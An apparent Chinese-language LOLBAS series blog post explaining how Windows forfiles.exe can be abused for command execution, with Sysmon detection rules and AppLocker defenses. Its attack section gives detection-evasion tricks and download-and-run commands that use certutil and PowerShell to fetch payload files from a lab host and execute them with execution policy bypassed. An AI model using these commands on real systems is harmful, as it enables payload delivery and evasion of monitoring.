【LOLBAS鐵人賽Day12】Forfiles.exe：批次檔案處理工具的命令執行技巧

714 字

4 分鐘

- views

【LOLBAS鐵人賽Day12】Forfiles.exe：批次檔案處理工具的命令執行技巧

2025-09-26

Research

LOLBAS

/

Windows

/

Security

Forfiles.exe 是 Windows 內建的批次檔案處理工具，原本用來根據檔案日期名稱等條件批次處理檔案
但它有個強大的功能 - 可以對每個符合條件的檔案執行任意命令，
這讓它成為攻擊者用來執行程式和繞過偵測的工具

Forfiles 是什麼？#

基本語法與功能#

Forfiles 的設計目的是自動化檔案管理：

選擇條件：日期副檔名路徑
執行命令：對每個檔案執行指定命令
變數替換：@file@path@ext 等
遞迴搜尋：可搜尋子目錄

正常的 Forfiles 使用#

1
:: 刪除 30 天前的日誌檔
2
forfiles /p "C:\Logs" /s /m *.log /d -30 /c "cmd /c del @path"
3

4
:: 列出今天修改的檔案
5
forfiles /p "C:\Users" /d +0 /c "cmd /c echo @path @fdate"
6

7
:: 壓縮舊檔案
8
forfiles /p "C:\Backup" /m *.txt /d -7 /c "cmd /c 7z a @fname.zip @file"

重點是：/c 參數可以執行任意命令，這就是我們這次主要的攻擊點

攻擊流程#

Step 1: 基本命令執行#

最簡單的執行方式：

1
:: 直接執行程式
2
forfiles /c "calc.exe"
3

4
:: 透過 cmd 執行
5
forfiles /c "cmd /c calc.exe"
6

7
:: 執行 PowerShell
8
forfiles /c "powershell.exe -c Write-Host 'Forfiles Execution'"

Step 2: 繞過偵測的技巧#

1
:: 使用搜尋條件隱藏意圖
2
forfiles /p "C:\Windows\System32" /m "svchost.exe" /c "cmd /c calc.exe"
3
:: 看起來在處理 svchost.exe，實際執行 calc.exe

Step 3: 進階應用#

下載並執行#

1
:: 使用 certutil 下載
2
forfiles /c "cmd /c certutil -urlcache -f http://10.211.55.6:8080/payload.ps1 %temp%\p.ps1"
3
forfiles /c "powershell -ep bypass -f %temp%\p.ps1"
4

5
:: 使用 PowerShell 下載
6
forfiles /c "powershell -c (New-Object Net.WebClient).DownloadFile('http://10.211.55.6:8080/payload.exe','%temp%\update.exe')"
7
forfiles /c "%temp%\update.exe"

實際測試（Windows 11）#

測試環境準備#

1
mkdir C:\TestLab
2
cd C:\TestLab
3
echo test > test.txt

基本功能測試#

1
:: 測試檔案列舉
2
forfiles /p "C:\TestLab" /c "cmd /c echo @file @fdate @ftime"
3

4
:: 測試命令執行
5
forfiles /p "C:\TestLab" /m "*.txt" /c "cmd /c echo Found: @path && calc.exe"

繞過技巧測試#

1
:: 隱藏在正常操作中
2
forfiles /p "C:\Windows\System32" /m "cmd.exe" /c "cmd /c echo Checking system files... && timeout 2 && calc.exe"
3

4
:: 多層巢狀
5
forfiles /c "cmd /c forfiles /c calc.exe"

偵測&防禦建議#

關鍵偵測指標#

forfiles + /c 執行非檔案管理命令
forfiles 執行 PowerShellcmdrundll32 等
forfiles 在 TempDownloads 等可疑位置執行
forfiles 產生網路連線活動

Sysmon 設定#

1
<RuleGroup name="Forfiles Detection">
2
  <ProcessCreate onmatch="include">
3
    <Image condition="end with">forfiles.exe</Image>
4
    <CommandLine condition="contains any">
5
      powershell;cmd /c;certutil;rundll32;regsvr32;mshta
6
    </CommandLine>
7
  </ProcessCreate>
8
  <ProcessCreate onmatch="include">
9
    <ParentImage condition="end with">forfiles.exe</ParentImage>
10
  </ProcessCreate>
11
</RuleGroup>

防禦策略#

1
# AppLocker 規則限制
2
$xml = @"
3
<AppLockerPolicy Version="1">
4
  <RuleCollection Type="Exe" EnforcementMode="Enabled">
5
    <FilePathRule Id="Block_Forfiles_Abuse" Name="Block Forfiles Command Execution"
6
                  Description="Prevent forfiles from executing commands"
7
                  UserOrGroupSid="S-1-1-0" Action="Deny">
8
      <Conditions>
9
        <FilePathCondition Path="%SYSTEM32%\forfiles.exe"/>
10
      </Conditions>
11
    </FilePathRule>
12
  </RuleCollection>
13
</AppLockerPolicy>
14
"@
15

16
# 限制一般使用者執行
17
icacls "C:\Windows\System32\forfiles.exe" /deny "Users:(RX)"